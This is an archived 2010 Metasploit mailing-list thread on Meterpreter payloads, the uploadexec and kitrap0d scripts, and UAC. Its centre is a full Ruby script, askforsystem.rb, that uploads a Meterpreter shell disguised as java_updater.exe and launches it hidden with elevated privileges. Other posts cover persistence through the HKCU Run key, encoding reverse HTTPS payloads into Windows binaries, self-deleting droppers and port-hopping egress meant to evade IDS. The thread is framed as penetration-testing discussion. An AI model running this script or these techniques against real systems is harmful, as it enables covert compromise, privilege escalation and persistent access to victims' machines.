Metasploit mailing list archives
Re: uploadexec and kitrap0d
From: Carlos Perez <carlos_perez () darkoperator com>
Date: Mon, 12 Jul 2010 14:18:49 -0400
Check the lib/scripts/meterpreter there is a mixing there with several new API calls and there is a check UAC one. I will write some documentation and post it today Sent from my iPhone On Jul 12, 2010, at 1:08 PM, Rob Fuller <mubix () room362 com> wrote:
Thats a pretty pimp script. Carlos? Some of the UAC checks would also be handy in other scripts as well. Nice work Devin! -- Rob Fuller | Mubix Room362.com | Hak5.org On Sun, Jul 11, 2010 at 2:15 PM, Devin Kinch <devinkinch () gmail com> wrote: Kitrap0d never works in the wild, in my experience (too old now). If you're into social engineering and the rules of engagement permit it, I wrote a cheap hack called askforsystem.rb. Essentially, copies over a couple files from the "Elevate" Windows power tool, and a new shell. It then executes the new shell with high IL privileges (which prompts the user with UAC). I chose the name java_updater.exe for the new shell. It's cheap, but it works more often than not. To use, copy all the files from the elevate power tool to your msf data directory (extract the archive first): http://technet.microsoft.com/en-us/magazine/2007.06.utilityspotlight.aspx Then copy a meterpreter shell executable named shell.exe into your msf data directory. The name is hard-coded right now. Sorry. Then save the following script to your meterpreter scripts directory as askforsystem.rb: ----- cut ----- ###################################################### # AskForSystem: Bypass UAC by, well, asking for it # ###################################################### session = client host,port = session.tunnel_peer.split(':') def uaccheck(session) uac = false winversion = session.sys.config.sysinfo if winversion['OS']=~ /(Vista|7)/ if session.sys.config.getuid != "NT AUTHORITY\\SYSTEM" print_status("Checking if UAC is enabled ...") key = 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System' root_key, base_key = session.sys.registry.splitkey(key) value = "EnableLUA" open_key = session.sys.registry.open_key(root_key, base_key, KEY_READ) v = open_key.query_value(value) if v.data == 1 print_status("\tUAC is Enabled") uac = true else print_status("\tUAC is Disabled") end end end return uac end def upload(session,file,fileontrgt) location = session.fs.file.expand_path("%TEMP%") fileontrgt = "#{location}\\" + fileontrgt print_status("Uploading File #{file} ...") session.fs.file.upload_file("#{fileontrgt}","#{file}") print_status("Upload Complete ...") return fileontrgt end def execute_as_system(session,file) location = session.fs.file.expand_path("%TEMP%") print_status("Running Commands ...") session.sys.process.execute("cmd /c #{location}\\elevate #{location}\\#{file}", nil,{'Hidden' => true,'Channelized' => false}) end if not uaccheck(session) then print_status("UAC isn't running, don't bother...") raise Rex::Script::Completed end elevatecmd = File.join(Msf::Config.install_root, "data", "elevate.cmd") elevatevbs = File.join(Msf::Config.install_root, "data", "elevate.vbs") shell = File.join(Msf::Config.install_root, "data", "shell.exe") upload(session,elevatecmd,"elevate.cmd") upload(session,elevatevbs,"elevate.vbs") upload(session,shell,"java_updater.exe") sleep 1 print_status("Executing shell as system...") execute_as_system(session,"java_updater.exe") ----cut---- My ruby sucks, but you get the idea. If someone wants to take the above script and add the appropriate railgun calls to ShellExecuteEx with the runas verb, be my guest. Also keep in mind that UAC isn't that big of an obstacle to Pen Testing... you can still read all of the users data. You can also still write to several directories in their profile (AppData is shown as the target above). You can also make meterpreter persistent by writing to the HKCU\software\microsoft\windows\currentversion\run key. But no hashes :( Invisible things lab blog has a great writeup of UAC here: http://theinvisiblethings.blogspot.com/2007/02/running-vista-every-day.html Especially relevant is the criticism that it doesn't protect any user data, it just prevents machines from being malware infested bots. Devin On Sat, Jul 10, 2010 at 6:58 AM, Miguel Rios <miguelrios35 () yahoo com> wrote: Just tried it. Working like a charm now. Uploaded and executed without a problem. I should be the one thanking you for sharing so much of your knowledge. Your scripts rock and I have learned tons from reading you over the years. I also noticed the kitrap0d script didn't work on the win 7 machine, probably all patched by now. I know that getprivs has gone through some changes so what's the best script to run right off the bat when you have meterpreter running as non-privileged user, before running scraper, hashdump and the like? cheers --- On Sat, 7/10/10, Carlos Perez <carlos_perez () darkoperator com> wrote: From: Carlos Perez <carlos_perez () darkoperator com> Subject: Re: [framework] Meterpreter unexpectedly closes To: "Miguel Rios" <miguelrios35 () yahoo com> Cc: framework () spool metasploit com Date: Saturday, July 10, 2010, 1:45 PM svn up and give it a try now, it should be fixed. Thanks for reporting it On Jul 10, 2010, at 9:21 AM, Miguel Rios wrote:Thanks Carlos. Here's the output: running against a win 7 7600 build (english) machine. meterpreter > run uploadexec -e /root/notepad.exe [*] Running Upload and Execute Meterpreter script.... [*] Uploading /root/notepad.exe.... [*] /root/notepad.exe uploaded! [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP42.exe [-] Error in script: ArgumentError wrong number of arguments (4 for 1) meterpreter > run uploadexec -e /root/notepad.exe -o /Q [*] Running Upload and Execute Meterpreter script.... [*] Uploading /root/notepad.exe.... [*] /root/notepad.exe uploaded! [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP41.exe [-] Error in script: ArgumentError wrong number of arguments (4 for 1) meterpreter > run uploadexec -e /root/notepad.exe -v [*] Running Upload and Execute Meterpreter script.... [*] Uploading /root/notepad.exe.... [*] /root/notepad.exe uploaded! [*] Uploaded as C:\Users\xx\AppData\Local\Temp\TMP45.exe [-] Error in script: ArgumentError wrong number of arguments (4 for 1) meterpreter > --- On Sat, 7/10/10, Carlos Perez <carlos_perez () darkoperator com> wrote: From: Carlos Perez <carlos_perez () darkoperator com> Subject: Re: [framework] Meterpreter unexpectedly closes To: "Miguel Rios" <miguelrios35 () yahoo com> Cc: "Alex Polychronopoulos" <tweakier () gmail com>, framework () spool metasploit com Date: Saturday, July 10, 2010, 12:49 PM Miguel Do send me the output of what your getting and the command it self and I will take a look Cheers, Carlos On Jul 10, 2010, at 8:34 AM, Miguel Rios wroteThanks. That explains it perfectly. For some reason I thought that meterpreter would continuously try to connect back. Now I know I was wrong. I had tried the loop option with VBS but the problem is that my custom script is designed to delete itself after running the meterpreter binary, so it obviously won't be there to respawn meterpreter. A bit of a catch 22. Thinking out loud, I could either schedule it to start every x minutes (but you need to be admin to use the 'at' and 'schtasks' I believe) or have it auto run at startup through the registry and have a listener permanently set up on the internet listening and ready to run a bunch of scripts like scraper, etc (by the way, any literature out there on setting up just meterpreter listeners and scripts on a webserver or do I have to set up the full MSF on the server?). Thanks also to 5.K1dd for responding but Alex cleared it up perfectly. It wasn't a question of the exploited process dying since it's a standalone meterpreter binary I'm playing with. Curious to see if there is any news or development regarding the all_ports possibility for this payload, like with reverse_tcp. That would be super stealth and highly effective at egressing the most restrictive networks. P.S. off topic here but I'm also having trouble with the uploadexec script. I manage to upload my notepad.exe binary to %temp% but it doesn't execute and the script spits out some error message about wrong count (4 of 1 or something like that) or missing argument. Does this have something to do with the -o switch? Is it mandatory? I just want my binary to be silently executed but I must be missing something stupidly obvious. Time to sleep maybe. --- On Sat, 7/10/10, Alex Polychronopoulos <tweakier () gmail com> wrote: From: Alex Polychronopoulos <tweakier () gmail com> Subject: Re: [framework] Meterpreter unexpectedly closes To: "Miguel Rios" <miguelrios35 () yahoo com> Cc: framework () spool metasploit com Date: Saturday, July 10, 2010, 8:28 AM Meterpreter is designed to not persistently trying to connect back to the handler, it tries once and then dies, so you're not doing something wrong. What you can do here is try the msfencode -t loop_vbs option which converts the payload into a vbscript and runs it every 5 seconds by default (you can change this by editing the generated .vbs file). On Sat, Jul 10, 2010 at 3:33 AM, Miguel Rios <miguelrios35 () yahoo com> wrote: Hi list, I've msfencoded a meterpreter reverse https payload using a win binary as a template. Everything seems to work fine when I test it in my XP SP3. I see the outbound connection and the process running, but after about a minute or so the process dies if there's no listener configured on the receiving end and doesn't respawn. What am I doing wrong here? I must be missing something obvious. Is there a timeout option for this reverse shell or a way to keep the process always running, even if it can't connect to the listener? Or is this due to msfencoding the payload somehow breaks it? I have tested that it does work properly when the listener is waiting for it, it's just the fact it timesout so quickly that is a pain. Also, saw the reverse_tcp allports payload and was wondering if there's a similar one for reverse meterpreter https. Ideally one could configure default ports to try 1st and then keep trying randomly the other 65000 or so to evade IDS. I know this would increase the payload size but it would be pretty stealth egress wise. Thanks. I do really love metasploit and the whole community behind it. You all rock. Miguel _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework _______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
_______________________________________________ https://mail.metasploit.com/mailman/listinfo/framework
Current thread:
- Re: Meterpreter unexpectedly closes, (continued)
- Re: Meterpreter unexpectedly closes 5.K1dd (Jul 09)
- Re: Meterpreter unexpectedly closes Alex Polychronopoulos (Jul 10)
- Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)
- Re: Meterpreter unexpectedly closes Carlos Perez (Jul 10)
- Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)
- Re: Meterpreter unexpectedly closes Carlos Perez (Jul 10)
- Re: uploadexec and kitrap0d Miguel Rios (Jul 10)
- Re: uploadexec and kitrap0d Carlos Perez (Jul 10)
- Re: uploadexec and kitrap0d Devin Kinch (Jul 11)
- Re: uploadexec and kitrap0d Rob Fuller (Jul 12)
- Re: uploadexec and kitrap0d Carlos Perez (Jul 12)
- php_include confusion Jeffs (Jul 12)
- Re: php_include confusion egypt (Jul 12)
- Re: php_include confusion HD Moore (Jul 12)
- Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)
- Re: uploadexec and kitrap0d Carlos Perez (Jul 12)
- Re: Meterpreter unexpectedly closes CED (Jul 10)
- Re: Meterpreter unexpectedly closes Joshua J. Drake (Jul 11)
- Re: Meterpreter unexpectedly closes Miguel Rios (Jul 10)